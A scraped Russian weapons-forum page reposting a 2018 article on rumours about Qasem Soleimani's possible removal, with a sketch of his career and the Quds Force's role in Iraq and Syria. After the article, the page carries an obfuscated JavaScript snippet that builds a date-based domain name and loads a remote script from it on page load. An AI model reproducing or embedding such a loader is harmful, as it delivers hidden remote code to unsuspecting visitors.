Оружие,огнестрельное оружие Форум об оружииМировое оружие Журнал оружиеОбои оружия
 
Пистолеты Пистолеты
Пистолеты пулеметы
Винтовки
Снайперские винтовки
Дробовики
пулемёты
Гранатометы
Патроны

О будущем самого опасного человека

Про слухи связанные с возможной отставкой Сулеймани.

В западную прессу просочились слухи о разногласиях между командующим Корпусом стражей исламской революции Али Джафари и командиром спецподразделения «Кудс» Кассимом Сулеймани.
Прооппозиционные сирийские источники указывают: весть об этом достигла ушей Высшего руководителя Ирана Али Хаменеи, который всерьёз задумался о смещении Сулеймани с должности по подозрению в коррупции и утрате доверия.
А ведь Высший руководитель подчеркнул, что «важность физического присутствия Кассима Сулеймани в Ираке и Сирии». Всё это, по словам Хаменеи, свидетельствует о необходимости назначения преемника командира спецподразделения «Кудс» или же полноценную его интеграцию в состав КСИР.

Фактически, лидер ясно даёт понять — незаменимых людей нет, а Касиму, сделавшего чрезвычайно много для иранской экспансии в Сирию и Ирак, следует подготовить достойную замену. Мало ли что.
Ряд иранских источников (тот же «Tehran Times») указывает на то, что Сулеймани, возможно, уйдёт на повышение и займёт место Джафари во главе КСИР.

Давайте немного вспомним, кто такой Кассим Сулеймани.


Юный Кассим Сулеймани

Военная карьера юного Кассима, которого много лет позже назовут одним из 13-ти опаснейших людей в мире, началась в годы ирано-иракской войны. Подразделение, в составе которого воевал Сулеймани, даже попало под удар химического оружия.
У Кассима никогда не было приличествующего образования, но это с лихвой окупали командирские навыки. Разменяв третий десяток, он стал комбатом и боролся с курдскими партизанами, а затем ловил контрабандистов на афганской границе.
Возглавил «Кудс» Сулеймани в 1997 году. Кроме него тогда же на свои посты были назначены различные руководители силовых ведомств, в том числе и командующий КСИР.


Спецподразделение «Кудс»

Первую проверку «боем» спецподразделение под руководством Кассима Сулеймани прошло в Афганистане в боях с Талибаном. Под грамотным руководством спецов «Кудс» значительно укрепили позиции ливанская «Хезбалла» и палестинское сопротивление. По сути, Касим вместе со своим подразделением нёс за рубеж постулаты иранской революции.
В Ираке он же сформировал «Хашд Шааби», а в Сирии — «Силы национальной обороны». Он же играет роль связующей нити между Москвой, Тегераном, Дамаском и Багдадом на поле боя. При этом он прекрасно отдаёт себе отчёт о «качестве» как сирийских, так и иракских вооружённых сил. В 2009 году он говорил: «Дайте мне один полк Бассиджа [вооружённое ополчение в Иране, самостоятельная силовая структура со своей техникой и авиацией, по примеру которой сейчас и делают иракские «Хашд Шааби»], и я захвачу Сирию за неделю!».

Его же заслугой стала показательная порка иракских курдов осенью 2017 года, когда те возжелали независимости.
Если этого мало — Высший руководитель назвал его «живым великомучеником» — при жизни этот человек смог достичь того, что не под силу павшим.

Снять его с должности было бы огромной ошибкой — в Тегеране не глупцы сидят. Да и назначать его главой КСИР тоже не станут — профиль не тот. А вот мягко подвинуть и отправить в почётнейшую отставку после передачи дел и должности могли бы. Но не станут. Пока в Сирии, Ираке и Палестине неспокойно (а в ближайшие лет 5, а то и 10 стабильности не ждите), его не тронут — слишком велики риски провала всех операций.

https://zen.yandex.ru/media/rybar/samyi-opasnyi-chelovek-na-blijnem-vostoke-5ae457c13dceb76be76ec0ed — цинк

Все же, отзыв в Тегеран я бы совсем не исключал. Если Иран захочет несколько снизить накал напряженности с США перед переговорами о будущем ядерной сделки, то отзыв Сулеймани может стать сигналом, что Иран готов к определенным компромиссам, чтобы избежать прямой войны. Но все же продолжение жесткой линии Тегераном видится более вероятным, а в этом случае без Сулеймани иранцам не обойтись. Трудно представить нынешние внешнеполитические успехи Ирана без деятельности этого человека, который своей неукротимой энергией деятельно разрушал планы США, Саудовской Аравии и Израиля на Ближнем Востоке.

(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/code/124.js',t.getElementById('epsilon1nu124').appendChild(p)})();



Источник: rusdozor.ru

Вас заинтересует

  • В Иране испытана новая баллистическая ракета. Получите допуск СРО
  • Мощь Востока: каков военный потенциал Ирана
  • СМИ: потери иранского контингента в Сирии значительно увеличились
  • Духовный лидер Ирана: США нельзя доверять в вопросах снятия санкций
  • Правительство Ирана существенно увеличит финансирование Вооруженных сил в 2014 году



  • Категория: Военная политика / new|Просмотров: 230 | Добавил: Vangan | Дата: 28-04-2018, 19:45 | | | Дополнить статью!
    Рейтинг:

    Логин:
    Пароль:
    Регистрация
    Забыли пароль?


     
    Журналы
    Журнал оружие
    Самодельные jружия
    Свежие новости
    16 лет спустя: Бен Аффлек рассказал, каким был его роман с Дженнифер Лопес 0629.com.ua
    Чем аэрационные фонари отличаются от световых и светоаэрационных? magazin01.ru
    Лодочные моторы "Марлин" - обзор, характеристики и отзывы royal-shop.kz
    ММЗ - прицеп для легкового автомобиля: технические характеристики, переделка, ремонт avto-trailer.by
    Лучшие турецкие драмы: список и отзывы aziya.tv
    Образцы ответов на жалобы. Образец ответа на жалобу гражданина rutube.ru
    Файлообменная сеть: типы и принцип работы. Бесплатный файлообменник dropfiles.ru
    Что такое утрата товарной стоимости автомобиля, и кем она возмещается? krimex-neu.com
    Ценообразование: формулы, принципы расчета
    Судебная экспертиза: что это за профессия, где учиться, кем работать? Судебный эксперт krimex-neu.com
    Виды оружея
    Самодельое оружие

    Самодельные пистолеты пулеметы |Дизайн by Devil_Лайка and Vangan|Vangan media © 2009-2020 Sokduerweapons

    » » » О будущем самого опасного человека